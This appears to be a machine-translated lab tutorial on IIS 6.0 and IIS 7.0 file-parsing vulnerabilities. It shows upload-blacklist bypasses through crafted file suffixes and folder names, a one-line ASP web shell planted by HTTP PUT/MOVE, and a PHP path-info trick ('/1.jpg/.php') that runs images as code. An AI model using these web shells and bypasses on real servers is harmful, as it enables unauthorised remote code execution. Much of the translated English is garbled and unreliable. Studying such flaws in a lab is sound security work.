A, IIS6.0 Parsing Vulnerability
A vulnerability (suffix bypass)
vulnerabilities two (directory parsing)
(document analysis) three vulnerabilities
(vulnerabilities and combine PUT III) supplement
Two, IIS7.0 Parsing Vulnerability
IIS6.0 Parsing Vulnerability
Built environment: Windows Server 2003
A loophole:
When the target server .asp suffix prohibit the uploading of files, you can use the suffix .cer or .asa bypass, both as a suffix still asp file parsing execution
cases: There peak.cer and peak.asa, its content is
<%
response.write("Hello World!")
%>
Vulnerability II:
Built on the site when .asa * * .asp or a folder, any files in that folder are as asp IIS file parsing and execution, also called directory resolve
cases: to create a website in the root directory x.asp folder, x.asp folder has a 1.txt, the content of the following 1.txt
<%
response.write("Hello World!")
%>
Showing the results:
Note: This sentence may 1.txt content, so that permission is obtained to the target server
, for example, using a word: <% eval request ( "peak ")%>
Vulnerability III:
When IIS process like * .asp; * jpg when these special file name will; content directly to later ignored, will; in front of the file as asp parsing execution, doing so mainly to the destination server settings to bypass the upload blacklist file may also be referred to as a parse
Example: a peak.asp; jpg or peak.asp; 1.jpg, which reads: <% eval request ( "peak ")%>
supplement:
PUT can be combined with the three vulnerabilities, Trojan upload a word file, and execute it in order to resolve asp
condition: to have write access to
1, the first to write a sentence in the local, if the target not to upload .asp, then we. txt always be right, such as uploading a xx.txt, content: <% eval request ( "peak ")%>
If you can not PUT, because you do not have write permission to the root directory of users, I am here to direct full control
2, using the software to upload PUT
3, using special software to move mOVE file name
4, last accessed the target file
access:
ant sword connection:
IIS7.0 Parsing Vulnerability
Principle: IIS and Nginx from right to left to determine whether the suffix know this, they see the suffix know, for example: is the end in .php, to deal with php, php when opened cgi.cgi_pathinfo = 1, will be on the path to the file repair, repair what is? For example: When php encounters a file path xx.jpg / xx.txt / xx.php, it will first determine whether xx.jpg / xx.txt / xx.php this file exists (note xx.jpg / xx.txt /xx.php is full), if xx.jpg / xx.txt / xx.php does not exist in, delete /xx.php, keep looking forward, if xx.jpg / xx.txt exist, then the last executed file is xx.jpg / xx.txt; if xx.jpg / xx.txt does not exist, delete /xx.txt, keep looking forward, to determine whether there xx.jpg, so
Note: xx here. jpg file and xx.txt it is also the directory because it documents there is also Well, can not find it up to find a
Experimental environment: (+ IIS7.x any PHP-CGI version of the FAST +)
Windows Server 2008
phpstudy2018
Exploit conditions:
. 1, where the php.ini. 1 = cgi.cgi_pathinfo
2, IIS7.0 at FAST-CGI operating mode
(1) First, install IIS7.0 (remember to check the ASP-related and CGI), then install phpstudy, I chose the following
(2) and then visit the page about IIS
(3) create a php phpinfo file test environment is to build success
(4) re-create jpg file containing php code
(5) browser to access it and see
(6) Then try 1.jpg / .php file path to try to repair
(7) Ah, can not access, that we are going to configure, repair the php file path into force
us to modify the php.ini file, set cgi.cgi_pathinfo = 1, and remove the comment
(8) to the most important, change the handler mapping website
Be determined
(9) Finally, we take advantage of this feature php file repair vulnerability of execution
http://192.168.100.181/1.jpg/.php
原理:
因为URL最后有.php,所以IIS将1.jpg/.php交给php处理,php修理文件路径1.jpg/.php,发现1.jpg/中的.php不存在于服务器中,所以向前寻找1.jpg,判断1.jpg是否存在,结果存在,那么就把该文件当做php解析代码执行了